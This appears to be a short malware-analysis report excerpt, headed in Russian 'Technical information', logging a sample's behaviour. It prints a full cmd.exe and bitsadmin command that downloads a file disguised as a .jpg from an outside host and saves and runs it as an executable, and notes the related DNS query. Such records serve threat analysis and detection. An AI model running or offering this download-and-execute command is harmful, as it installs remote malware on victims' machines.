Техническая информация
- '<SYSTEM32>\cmd.exe' /C CD C: & bitsadmin /transfer mXOnlwOxXFzxaUxLyEmVQUAMOp /priority foreground http://b.reich.io/ixxppu.jpg %HOMEPATH%\hPqvSGWzqEgVRAWN.exe && start %HOMEPATH%\hPqvSGWzqEgVRAWN.exe
- DNS ASK b.##ich.io
- '<SYSTEM32>\cmd.exe' /C CD C: & bitsadmin /transfer mXOnlwOxXFzxaUxLyEmVQUAMOp /priority foreground http://b.reich.io/ixxppu.jpg %HOMEPATH%\hPqvSGWzqEgVRAWN.exe && start %HOMEPATH%\hPqvSGWzqEgVRAWN.exe' (со скрытым окном)
- '<SYSTEM32>\bitsadmin.exe' /transfer mXOnlwOxXFzxaUxLyEmVQUAMOp /priority foreground http://b.reich.io/ixxppu.jpg %HOMEPATH%\hPqvSGWzqEgVRAWN.exe